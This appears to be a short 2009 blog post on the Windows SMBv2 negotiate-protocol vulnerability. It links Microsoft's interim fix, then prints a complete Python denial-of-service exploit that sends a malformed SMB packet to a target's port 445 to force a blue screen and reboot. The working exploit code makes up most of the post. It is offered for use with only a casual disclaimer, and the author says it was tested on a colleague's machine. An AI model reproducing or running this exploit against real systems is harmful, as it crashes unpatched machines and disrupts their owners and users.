Sep/090
Microsoft SMB2 Vulnerability update.
Microsoft has released a news update with links to a "Microsoft Fix It" package that will disable SMBv2 until a proper patch is released. Check out http://blogs.technet.com/srd/archive/2009/09/18/update-on-the-smb-vulnerability.aspx to read.
For those of you that do not know what I'm talking about, by using a specially created packet an attacker can exploit a bug in SMBv2 (the protocol that Microsoft File and Print Sharing relies on) and cause a system to blue screen and reboot.
I have tested this myself and it has worked every time..sorry Chaim.
Below is the code that I have been using to to actually exploit this vulnerability. Use with caution and don't be malicious. I take no responsibility for your shenanigans.
This code came from milw0rm.
#!/usr/bin/python
from socket import *
from time import sleep
hosty = "ip.of.target.machine"
print hosty
host = hosty, 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26" # Process ID High: normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.settimeout(1)
s.connect(host)
s.send(buff)
s.close()